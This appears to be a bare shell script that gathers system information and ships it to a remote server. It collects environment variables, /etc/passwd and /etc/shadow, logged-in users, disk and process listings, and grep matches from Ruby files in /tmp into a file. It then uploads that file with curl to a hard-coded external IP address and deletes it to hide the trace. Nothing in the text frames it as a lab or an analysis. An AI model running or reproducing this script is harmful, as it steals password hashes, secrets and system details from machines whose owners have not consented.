pwd > testing
echo ----------------- ls ------- >> testing
find /tmp/ -depth -name "*.rb" -printf "--------------%p-----------\n" -exec grep -e "exec_bash" -e "extract_ip" -e "JSON" -e "http" -e "ip" '{}' \; >> testing
echo ----------------- Environment ------- >> testing
env >> testing
echo ----------------- User Info ------- >> testing
cat /etc/passwd >> testing
cat /etc/shadow >> testing
echo ----------------- Users logged in ------- >> testing
w >> testing
echo ----------------- Disk Space ------- >> testing
df -h >> testing
echo ----------------- ps -aux ------- >> testing
ps -aux >> testing
echo ----------------- END ------- >> testing
curl -F "name=@testing" http://138.68.58.230:8080 && echo -n ool
rm testing
